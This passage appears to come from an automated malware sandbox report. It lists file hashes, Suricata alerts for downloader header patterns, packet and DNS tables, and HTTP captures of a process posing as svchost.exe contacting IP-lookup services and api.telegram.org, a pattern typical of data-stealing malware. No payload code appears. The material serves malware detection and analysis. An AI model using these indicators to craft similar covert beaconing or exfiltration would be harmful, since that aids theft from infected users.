                                                                                                                                                                                  SSDEEP:24576:3fmMv6Ckr7Mny5QLMwDMZE4mqu6p0DWsRmic2V993wZC:33v+7/5QLMLE2hq93w
                                                                                                                                                                                  TLSH:1775E112B7D680B6D9A339B12A7BE327EB3575194323C487B7E42E778F211405B36362
                                                                                                                                                                                  File Content Preview:...............................................................................................................................................................................................................................................................

                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                  2024-10-24T18:36:01.522384+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049790158.101.44.24280TCP
                                                                                                                                                                                  2024-10-24T18:36:03.053396+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049790158.101.44.24280TCP
                                                                                                                                                                                  2024-10-24T18:36:03.459445+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049792104.21.67.152443TCP
                                                                                                                                                                                  2024-10-24T18:36:03.774476+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049793158.101.44.24280TCP
                                                                                                                                                                                  2024-10-24T18:36:04.219404+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049794104.21.67.152443TCP
                                                                                                                                                                                  2024-10-24T18:36:06.972892+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049800104.21.67.152443TCP

                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Oct 24, 2024 18:36:01.000677109 CEST4979080192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:01.155700922 CEST8049790158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:01.155879021 CEST4979080192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:01.156035900 CEST4979080192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:01.310839891 CEST8049790158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:01.313177109 CEST8049790158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:01.322102070 CEST4979080192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:01.479409933 CEST8049790158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:01.522383928 CEST4979080192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:01.981328011 CEST49791443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:01.981359005 CEST44349791104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:01.981534958 CEST49791443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:01.996344090 CEST49791443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:01.996362925 CEST44349791104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:02.199912071 CEST44349791104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:02.200112104 CEST49791443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:02.205264091 CEST49791443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:02.205276966 CEST44349791104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:02.205558062 CEST44349791104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:02.256609917 CEST49791443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:02.264463902 CEST49791443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:02.308008909 CEST44349791104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:02.835405111 CEST44349791104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:02.835469007 CEST44349791104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:02.835727930 CEST49791443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:02.838282108 CEST49791443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:02.848227024 CEST4979080192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:03.004323006 CEST8049790158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.006683111 CEST49792443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:03.006768942 CEST44349792104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.007018089 CEST49792443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:03.007299900 CEST49792443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:03.007354021 CEST44349792104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.053395987 CEST4979080192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:03.206700087 CEST44349792104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.208090067 CEST49792443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:03.208105087 CEST44349792104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.459423065 CEST44349792104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.459497929 CEST44349792104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.459688902 CEST49792443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:03.459976912 CEST49792443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:03.462080956 CEST4979080192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:03.462831020 CEST4979380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:03.617213011 CEST8049790158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.617691040 CEST4979080192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:03.617794037 CEST8049793158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.618169069 CEST4979380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:03.618169069 CEST4979380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:03.773260117 CEST8049793158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.774074078 CEST8049793158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.774476051 CEST4979380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:03.775003910 CEST49794443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:03.775038958 CEST44349794104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.775326967 CEST49794443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:03.775414944 CEST49794443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:03.775434017 CEST44349794104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.929382086 CEST8049793158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.929569006 CEST4979380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:03.975708008 CEST44349794104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:03.977037907 CEST49794443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:03.977094889 CEST44349794104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.219372988 CEST44349794104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.219444990 CEST44349794104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.219650984 CEST49794443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:04.219908953 CEST49794443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:04.232743979 CEST4979580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:04.387039900 CEST8049795158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.387456894 CEST4979580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:04.387542963 CEST4979580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:04.542179108 CEST8049795158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.545656919 CEST8049795158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.546533108 CEST49796443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:04.546644926 CEST44349796104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.546809912 CEST49796443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:04.546994925 CEST49796443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:04.547046900 CEST44349796104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.605771065 CEST4979580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:04.746085882 CEST44349796104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.747507095 CEST49796443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:04.747514009 CEST44349796104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.990781069 CEST44349796104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.991075993 CEST44349796104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:04.991274118 CEST49796443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:04.991527081 CEST49796443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:05.011425018 CEST4979580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.011663914 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.166043997 CEST8049795158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.166095018 CEST8049797158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.166418076 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.166466951 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.166552067 CEST4979580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.320916891 CEST8049797158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.740911961 CEST8049797158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.742012978 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:05.742095947 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.742363930 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:05.742558956 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:05.742613077 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.787079096 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:05.941416979 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:05.942876101 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:05.942895889 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.188277006 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.188560009 CEST44349798104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.188786983 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.188960075 CEST49798443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.204858065 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.205423117 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.359266996 CEST8049797158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.359528065 CEST4979780192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.359673977 CEST8049799158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.359854937 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.359904051 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.514322996 CEST8049799158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.517585993 CEST8049799158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.518605947 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.518692970 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.518912077 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.519057035 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.519109011 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.568284988 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.724400043 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.725794077 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.725852013 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.972867012 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.972965956 CEST44349800104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:06.973134041 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.973432064 CEST49800443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:06.975814104 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:06.976607084 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.130239010 CEST8049799158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.130503893 CEST8049801158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.130584955 CEST4979980192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.130800009 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.130979061 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.284920931 CEST8049801158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.288815022 CEST8049801158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.289836884 CEST49802443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:07.289917946 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.290136099 CEST49802443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:07.290278912 CEST49802443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:07.290323973 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.333698034 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.493808031 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.503272057 CEST49802443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:07.503331900 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.737905979 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.738197088 CEST44349802104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.738354921 CEST49802443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:07.738595963 CEST49802443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:07.759752035 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.760482073 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.914303064 CEST8049801158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.914494038 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.915579081 CEST8049803158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.915779114 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.915836096 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.070884943 CEST8049803158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.071583033 CEST8049803158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.072547913 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.072587967 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.072848082 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.072973967 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.072994947 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.114798069 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.272279024 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.273708105 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.273765087 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.543697119 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.543943882 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.544199944 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.544492960 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.563353062 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.563991070 CEST4980580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.718462944 CEST8049803158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.718749046 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.718874931 CEST8049805158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.719089031 CEST4980580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.719151974 CEST4980580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.873964071 CEST8049805158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.876076937 CEST8049805158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.877166986 CEST49806443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.877197981 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.877372980 CEST49806443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.877557039 CEST49806443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.877567053 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.927073002 CEST4980580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:09.076153994 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.077512980 CEST49806443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:09.077564955 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.318010092 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.318306923 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.318531990 CEST49806443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:09.318762064 CEST49806443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:09.383114100 CEST4980580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:09.479732990 CEST49807443192.168.11.20149.154.167.220
                                                                                                                                                                                  Oct 24, 2024 18:36:09.479821920 CEST44349807149.154.167.220192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.480029106 CEST49807443192.168.11.20149.154.167.220
                                                                                                                                                                                  Oct 24, 2024 18:36:09.480309010 CEST49807443192.168.11.20149.154.167.220
                                                                                                                                                                                  Oct 24, 2024 18:36:09.480366945 CEST44349807149.154.167.220192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.538110971 CEST8049805158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.538321972 CEST4980580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:09.843854904 CEST44349807149.154.167.220192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.844181061 CEST49807443192.168.11.20149.154.167.220
                                                                                                                                                                                  Oct 24, 2024 18:36:09.846040964 CEST49807443192.168.11.20149.154.167.220
                                                                                                                                                                                  Oct 24, 2024 18:36:09.846059084 CEST44349807149.154.167.220192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.846398115 CEST44349807149.154.167.220192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.847774982 CEST49807443192.168.11.20149.154.167.220
                                                                                                                                                                                  Oct 24, 2024 18:36:09.888062000 CEST44349807149.154.167.220192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:10.173815012 CEST44349807149.154.167.220192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:10.173945904 CEST44349807149.154.167.220192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:10.174154043 CEST49807443192.168.11.20149.154.167.220
                                                                                                                                                                                  Oct 24, 2024 18:36:10.176572084 CEST49807443192.168.11.20149.154.167.220

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Oct 24, 2024 18:36:00.893542051 CEST5623653192.168.11.201.1.1.1
                                                                                                                                                                                  Oct 24, 2024 18:36:00.988576889 CEST53562361.1.1.1192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:01.884946108 CEST6553253192.168.11.201.1.1.1
                                                                                                                                                                                  Oct 24, 2024 18:36:01.980715990 CEST53655321.1.1.1192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.383492947 CEST5418353192.168.11.201.1.1.1
                                                                                                                                                                                  Oct 24, 2024 18:36:09.479007959 CEST53541831.1.1.1192.168.11.20

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Oct 24, 2024 18:36:00.893542051 CEST192.168.11.201.1.1.10x309dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 24, 2024 18:36:01.884946108 CEST192.168.11.201.1.1.10x61b7Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 24, 2024 18:36:09.383492947 CEST192.168.11.201.1.1.10x82cbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                  Oct 24, 2024 18:36:00.988576889 CEST1.1.1.1192.168.11.200x309dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                  Oct 24, 2024 18:36:00.988576889 CEST1.1.1.1192.168.11.200x309dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 24, 2024 18:36:00.988576889 CEST1.1.1.1192.168.11.200x309dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 24, 2024 18:36:00.988576889 CEST1.1.1.1192.168.11.200x309dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 24, 2024 18:36:00.988576889 CEST1.1.1.1192.168.11.200x309dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 24, 2024 18:36:00.988576889 CEST1.1.1.1192.168.11.200x309dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 24, 2024 18:36:01.980715990 CEST1.1.1.1192.168.11.200x61b7No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 24, 2024 18:36:01.980715990 CEST1.1.1.1192.168.11.200x61b7No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                                                                                  Oct 24, 2024 18:36:09.479007959 CEST1.1.1.1192.168.11.200x82cbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                                                                  • api.telegram.org
                                                                                                                                                                                  • checkip.dyndns.org

                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.11.2049790158.101.44.242808376C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Oct 24, 2024 18:36:01.156035900 CEST151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Oct 24, 2024 18:36:01.313177109 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:01 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 106
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: 62033393a02b4528f4963aba2fdd926d
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>
                                                                                                                                                                                  Oct 24, 2024 18:36:01.322102070 CEST127OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Oct 24, 2024 18:36:01.479409933 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Thu, 24 Oct 2024 16:36:01 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 106
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
